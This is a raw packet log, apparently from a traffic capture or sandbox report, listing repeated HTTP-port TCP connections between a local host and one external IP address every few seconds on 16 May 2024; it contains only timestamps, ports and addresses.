May 16, 2024 00:37:29.553953886 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:29.556037903 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:29.789844990 CEST	80	49731	45.90.57.51	192.168.2.5
May 16, 2024 00:37:29.789896965 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:30.025855064 CEST	80	49731	45.90.57.51	192.168.2.5
May 16, 2024 00:37:30.052185059 CEST	80	49731	45.90.57.51	192.168.2.5
May 16, 2024 00:37:30.052197933 CEST	80	49731	45.90.57.51	192.168.2.5
May 16, 2024 00:37:30.052261114 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:30.052308083 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:30.288242102 CEST	80	49731	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.194679022 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:31.429780960 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.430016041 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:31.431993008 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:31.666826010 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.666939974 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:31.901864052 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.926841974 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.926862955 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:31.926918030 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:31.926918030 CEST	49732	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:32.162110090 CEST	80	49732	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.070269108 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:33.312577009 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.312832117 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:33.315004110 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:33.557094097 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.557179928 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:33.797883987 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.823352098 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.823367119 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:33.823424101 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:33.823467016 CEST	49733	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:34.064394951 CEST	80	49733	45.90.57.51	192.168.2.5
May 16, 2024 00:37:34.961781979 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.197516918 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:35.197634935 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.199754953 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.434874058 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:35.435014009 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.669934988 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:35.696424961 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:35.696439028 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:35.696540117 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.696569920 CEST	49734	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:35.931469917 CEST	80	49734	45.90.57.51	192.168.2.5
May 16, 2024 00:37:36.882776022 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.128011942 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:37.128118038 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.130220890 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.370810032 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:37.370995998 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.611629009 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:37.637985945 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:37.638039112 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:37.638092041 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.638158083 CEST	49735	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:37.878675938 CEST	80	49735	45.90.57.51	192.168.2.5
May 16, 2024 00:37:38.773700953 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.016207933 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:39.016288996 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.020338058 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.263187885 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:39.263248920 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.506294012 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:39.532387972 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:39.532401085 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:39.532507896 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.714785099 CEST	49736	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:39.958524942 CEST	80	49736	45.90.57.51	192.168.2.5
May 16, 2024 00:37:41.507075071 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:41.742010117 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:41.742100000 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:41.744488001 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:41.979285002 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:41.979351997 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:42.215070009 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:42.248025894 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:42.248040915 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:42.248095036 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:42.248156071 CEST	49737	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:42.483462095 CEST	80	49737	45.90.57.51	192.168.2.5
May 16, 2024 00:37:43.382034063 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:43.621273041 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:43.621491909 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:43.623424053 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:43.856909037 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:43.856988907 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:44.090559006 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:44.125783920 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:44.125801086 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:44.125874043 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:44.125941038 CEST	49738	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:44.359457016 CEST	80	49738	45.90.57.51	192.168.2.5
May 16, 2024 00:37:45.288038969 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:45.528161049 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:45.528280020 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:45.530427933 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:45.770214081 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:45.770276070 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:46.012994051 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:46.034174919 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:46.034188986 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:46.034272909 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:46.034301043 CEST	49739	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:46.274255037 CEST	80	49739	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.211154938 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:47.450586081 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.450705051 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:47.452852011 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:47.692245007 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.692492962 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:47.931838036 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.955065966 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.955077887 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:47.955239058 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:47.955239058 CEST	49740	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:48.194509983 CEST	80	49740	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.101293087 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:49.341563940 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.341681004 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:49.343816996 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:49.584026098 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.584079027 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:49.824454069 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.847440958 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.847459078 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:49.847527027 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:49.847551107 CEST	49742	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:50.089255095 CEST	80	49742	45.90.57.51	192.168.2.5
May 16, 2024 00:37:50.990736961 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.230370998 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:51.230444908 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.232609987 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.471946955 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:51.472027063 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.711513996 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:51.736666918 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:51.736686945 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:51.736763000 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.736804962 CEST	49743	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:51.976073980 CEST	80	49743	45.90.57.51	192.168.2.5
May 16, 2024 00:37:52.882838964 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.117430925 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:53.117573023 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.120054960 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.357404947 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:53.357475042 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.592014074 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:53.617485046 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:53.617502928 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:53.617580891 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.622262001 CEST	49744	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:53.856759071 CEST	80	49744	45.90.57.51	192.168.2.5
May 16, 2024 00:37:54.772423029 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.008806944 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:55.008908033 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.010656118 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.246783972 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:55.246855021 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.483175993 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:55.510827065 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:55.510839939 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:55.510904074 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.510958910 CEST	49745	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:55.747158051 CEST	80	49745	45.90.57.51	192.168.2.5
May 16, 2024 00:37:56.858282089 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:57.097244978 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:57.097376108 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:57.099162102 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:57.338042974 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:57.338119984 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:57.577131033 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:57.604254961 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:57.604269028 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:57.604351044 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:58.087975979 CEST	49746	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:58.328548908 CEST	80	49746	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.227829933 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:59.468261957 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.468462944 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:59.470457077 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:59.710432053 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.710521936 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:59.950598001 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.975322962 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.975339890 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:37:59.975550890 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:59.975622892 CEST	49747	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:00.215730906 CEST	80	49747	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.116291046 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:01.354268074 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.354391098 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:01.356158972 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:01.594063044 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.594136000 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:01.832190990 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.857131004 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.857156038 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:01.857235909 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:01.857274055 CEST	49748	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:02.095238924 CEST	80	49748	45.90.57.51	192.168.2.5
May 16, 2024 00:38:02.991288900 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.237024069 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:03.237263918 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.239293098 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.484385967 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:03.484527111 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.725181103 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:03.750636101 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:03.750694036 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:03.750752926 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.750782013 CEST	49749	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:03.991497040 CEST	80	49749	45.90.57.51	192.168.2.5
May 16, 2024 00:38:04.898231030 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.133723974 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:05.133996964 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.193094015 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.428657055 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:05.428921938 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.664470911 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:05.694541931 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:05.694570065 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:05.694761038 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.694788933 CEST	49750	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:05.930248976 CEST	80	49750	45.90.57.51	192.168.2.5
May 16, 2024 00:38:06.835769892 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.069597006 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:07.069729090 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.071739912 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.305573940 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:07.305646896 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.539488077 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:07.563893080 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:07.563956022 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:07.564009905 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.564995050 CEST	49751	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:07.798593044 CEST	80	49751	45.90.57.51	192.168.2.5
May 16, 2024 00:38:08.712363958 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:08.953583002 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:08.953692913 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:08.955748081 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:09.197458029 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:09.197555065 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:09.438227892 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:09.462527037 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:09.462548018 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:09.462635994 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:09.462670088 CEST	49752	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:09.703330994 CEST	80	49752	45.90.57.51	192.168.2.5
May 16, 2024 00:38:10.617049932 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:10.857474089 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:10.857558012 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:10.859695911 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:11.100131035 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:11.100202084 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:11.341945887 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:11.363615036 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:11.363630056 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:11.363714933 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:11.363714933 CEST	49753	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:11.602511883 CEST	80	49753	45.90.57.51	192.168.2.5
May 16, 2024 00:38:12.509040117 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:12.748425007 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:12.748507023 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:12.750489950 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:12.990875006 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:12.990989923 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:13.231446981 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:13.256185055 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:13.256198883 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:13.256241083 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:13.256292105 CEST	49755	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:13.492141008 CEST	80	49755	45.90.57.51	192.168.2.5
May 16, 2024 00:38:15.455749035 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:15.697273016 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:15.697523117 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:15.699410915 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:15.940726995 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:15.940907955 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:16.182723999 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:16.216450930 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:16.216469049 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:16.216542006 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:16.216624022 CEST	49756	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:16.457804918 CEST	80	49756	45.90.57.51	192.168.2.5
May 16, 2024 00:38:17.365760088 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:17.601481915 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:17.601697922 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:17.603709936 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:17.851507902 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:17.851574898 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:18.100068092 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:18.130280972 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:18.130296946 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:18.130347967 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:18.130388021 CEST	49757	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:18.366137028 CEST	80	49757	45.90.57.51	192.168.2.5
May 16, 2024 00:38:19.277903080 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:19.512327909 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:19.512438059 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:19.541568995 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:19.775789976 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:19.775937080 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:20.010289907 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:20.039736032 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:20.039757967 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:20.039849997 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:20.039908886 CEST	49758	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:20.274548054 CEST	80	49758	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.194191933 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:21.427762032 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.428050995 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:21.430033922 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:21.663431883 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.663501024 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:21.896893978 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.924787045 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.924801111 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:21.924875021 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:21.925137997 CEST	49759	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:22.158421993 CEST	80	49759	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.090498924 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:23.331087112 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.331195116 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:23.333174944 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:23.573436022 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.573502064 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:23.813911915 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.839876890 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.839893103 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:23.840059996 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:23.840137959 CEST	49760	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:24.080715895 CEST	80	49760	45.90.57.51	192.168.2.5
May 16, 2024 00:38:24.976531982 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.209379911 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:25.209805965 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.211848974 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.444511890 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:25.444598913 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.677463055 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:25.707920074 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:25.707942009 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:25.708097935 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.708144903 CEST	49761	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:25.940809011 CEST	80	49761	45.90.57.51	192.168.2.5
May 16, 2024 00:38:26.850564957 CEST	49762	80	192.168.2.5	45.90.57.51
May 16, 2024 00:38:27.083501101 CEST	80	49762	45.90.57.51	192.168.2.5
